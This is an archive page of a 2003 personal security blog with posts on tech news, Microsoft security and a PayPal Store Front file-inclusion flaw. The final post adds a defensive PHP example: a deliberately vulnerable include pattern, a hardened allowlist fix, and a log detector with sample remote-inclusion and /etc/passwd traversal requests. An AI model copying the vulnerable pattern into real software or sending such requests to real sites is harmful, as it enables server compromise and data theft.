This of course isn't completely true. You can easily record anything that touches the wire, but the theory is quite interesting. Instead of fretting about scrubbing data off your hard drive you can simply NOT store it. Not sure if I would appreciate a few gigs of data floating on my network, but hey, it's not my idea.
Would be interesting to see where this might lead. There have been various views on this on the Bugtraq list if you are interested.
Posted by SilverStr at 07:53 AM | TrackBack
Site face lift
I decided to do a face lift on the blog, I hope you like it. It's now done (well, as much as I wanna do tonight anyways).
There are some pretty ugly CSS hacks in there which probably fail every friggin validator out there. But it renders in IE, Mozilla, FireBird and Opera. I would expect most others are fine.
Shouldn't matter though, since you SHOULD be reading my blog via RSS in your aggregator! :)
I have added some references to some of my favorite books on my bookshelf, as well as some of my favorite papers. These are of course subjective, and chosen at a whim. Some are old and outdated, but are references I seem to always remember in the back of my head.
Hope you like the new site.
Posted by SilverStr at 12:30 AM | Comments (8) | TrackBack
October 11, 2003
Blog changes in Progress
I am going to be overhauling my blog tonight, so bear with me if you encounter layout issues and other such problems.
I will post when it is complete.
Thanks for your patience.
Posted by SilverStr at 09:16 PM | TrackBack
October 10, 2003
Terrorism Information Awareness Program Shut Down
Inside DARPA, Admiral John Poindexter ran the Information Awareness Office and was building a vast computerized terrorism surveillance system. This system included some pretty kewl surveillance software, and was starting to be known as the watch dog of the American people, scanning personal records and building profiles of suspected terrorist-like activities.
Well, Wired reports that the project has been cancelled. Some software will be picked up by other government agencies (i.e. the National Foreign Intelligence Program, which will use the processing, analysis and collaboration tools for counterterrorism foreign-intelligence purposes).
Now Americans can feel free to buy the Anarchists Handbook online or check out Nuclear Fusion For Dummies without being targeted by DARPA. You'll just be flagged in the FBI database. Oh wait, you weren't supposed to know that.
Posted by SilverStr at 10:42 AM | TrackBack
Nice Tablet PC
I think I found the machine I might start drooling over. Scoble points out that Acer is coming out with the Travelmate C300, which is a souped-up Pentium M 1.5 GHz with 512 megs of RAM, a 14.1 inch display, a 40 gig hard drive and all the trimmings.
My laptop is much too slow to do development with Developer Studio, and I am going to need to upgrade soon. Although my desktop machine works great (and I don't know if I can live without my dual monitor set up) I spend a lot of time away from it in places where I could be productive if I had one of these things.
It has up to a 5 hour battery life which isn't too shabby and even has a built in bay for a CDRW/DVD combo. My only complaints are that it doesn't have Bluetooth and the thing weighs in at 6.2 pounds. My laptop right now is only 2 pounds, and I don't think I would want anything much heavier. (Ya I have been spoiled)
Chances are I will end up buying a lighter one that is used on Ebay or something. As much as this thing looks neat, I am not sure if I wanna pour $2,299 US for something that is 6.5 pounds. I'm told NEC has some of the lightest Tablets. I will have to check that out one of these days.
Posted by SilverStr at 08:50 AM | Comments (5) | TrackBack
October 09, 2003
Microsoft Security Patch Management
Everyone likes to knock MS for security patches. Solas had a good rant on it today. I think we need to remember that there are improved ways to deal with security in Windows environments, it's just that not many people know about them.
Microsoft released a data sheet today about their Systems Management Server 2003 product and how it deals with Security Patch Management. You can improve the security posture of your Windows environment through increased vulnerability awareness and reliable targeted delivery of updates. (Their words, not mine)
If you want to try to understand what SMS is about, you might wanna read this. You might find it useful when exploring what tools to use to manage security for your Windows platforms.
Posted by SilverStr at 04:32 PM | Comments (2) | TrackBack
Canadian government invests in rural connectivity
Here is why I love being a Canadian. The Government of Canada announced a strategic initiative through which they plan to extend broadband Internet connectivity to the nation's most remote communities via satellite.
We are one of the best wired nations because we would rather build infrastructure and build the foundation of knowledge for our children so we can grow as a better nation, rather than spend billions of dollars meddling in other countries' affairs. I am impressed with how the government intends to utilize this new connectivity. As an example, in rural communities where it might take days to get health care due to distance, doctors/nurses can perform some consultations with videoconferencing equipment quickly. In some cases, the doctors could even be in Toronto, Vancouver or even overseas. That's just kewl!
I am proud to be Canadian, as I always am. But things like this make me glow inside. What a great country to live in.
Posted by SilverStr at 09:04 AM | TrackBack
October 08, 2003
Microsoft details new 'Secure The Perimeter' Initiative
CRN has an article in which Bob Muglia (senior VP at Microsoft) discusses Microsoft's next-generation security initiative.
Basically he is saying what I have been preaching for years. Defense in depth with least privilege policies while at the same time separating roles and responsibilities. Top that off with secure defaults (why the heck hasn't the built-in firewall been on by default since it shipped?)
Time will tell if Microsoft will get this right. I hope so. I know they are trying, and if this article is any indication they are on the right track.
I love how the article ends up. Both Muglia and Microsoft CEO Steve Ballmer admit [security is] a bigger worry than Linux.
Posted by SilverStr at 06:28 PM | TrackBack
PayPal Store Front Vulnerability
Securiteam reports that a vulnerability in the PayPal Store Front product allows remote attackers to include arbitrary PHP files (which are then executed) that can be stored either locally on the server or remotely.
In other words, your cart is in doodoo if an attacker decides they wish to include an external file and execute arbitrary commands with the privileges of the web server. (Typically www-data or nobody)
Credits to Astharot over at Zone-h for the original security advisory.
So, if you are using the PayPal store front for your eBusiness... you might wanna look into this.
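The bug class here is file inclusion driven by request data. The snippet below is an added illustration written for this post, not code from the PayPal Store Front product or from the advisory; the parameter name `page`, the `pages/` directory and the allowlisted page names are assumptions. It puts the vulnerable pattern beside a hardened version, and adds a small request-log check of the kind you would run over web server logs to spot attempts after the fact.

```php
<?php
// Added example, not from the original post or the product. The parameter
// name "page", the pages/ directory and the page names are assumptions.

// VULNERABLE pattern: the request decides which file PHP includes. With
// allow_url_include on, a URL in the parameter pulls a remote file; with it
// off, "../" sequences still walk to local files the web server can read.
function render_page_vulnerable(array $get): void
{
    include $get['page'] . '.php';
}

// HARDENED pattern: untrusted input is only ever a key into a fixed map and
// never forms part of the path. Unknown keys get a 404, not a guess.
const PAGES = [
    'cart'     => 'cart.php',
    'checkout' => 'checkout.php',
    'thanks'   => 'thanks.php',
];

function resolve_page(string $requested): ?string
{
    // Exact key lookup: no concatenation, no normalisation to get wrong.
    return PAGES[$requested] ?? null;
}

function render_page_hardened(array $get): void
{
    $file = resolve_page((string)($get['page'] ?? 'cart'));
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    // __DIR__ is the directory of this script; the path is fully server-chosen.
    include __DIR__ . '/pages/' . $file;
}

// Belt and braces in php.ini, independent of the application code:
//   allow_url_include = Off
//   allow_url_fopen   = Off   (if nothing legitimately needs remote streams)

// Log review: flag query strings whose "page" value carries a URL scheme or a
// parent-directory reference. Returns the offending lines so they can be
// reviewed against the access log (sample lines below are constructed).
function find_inclusion_attempts(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        if (preg_match('/[?&]page=([^ &"]+)/', $line, $m)) {
            $value = rawurldecode($m[1]);
            if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value) || str_contains($value, '..')) {
                $hits[] = $line;
            }
        }
    }
    return $hits;
}

$constructedLog = [
    '203.0.113.9 - - [08/Oct/2003:17:50:01] "GET /shop/index.php?page=cart HTTP/1.1" 200',
    '203.0.113.9 - - [08/Oct/2003:17:50:07] "GET /shop/index.php?page=http://198.51.100.5/x HTTP/1.1" 200',
    '203.0.113.9 - - [08/Oct/2003:17:50:09] "GET /shop/index.php?page=..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200',
];

foreach (find_inclusion_attempts($constructedLog) as $hit) {
    echo "suspicious: $hit\n";   // prints the second and third sample lines
}
```

The log check is a triage aid, not a control; the allowlist and the php.ini settings are what close the hole. Note that a 200 status on such a request tells you nothing about whether the include succeeded, so review the application's own error log alongside the access log.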
Posted by SilverStr at 05:56 PM | Comments (2)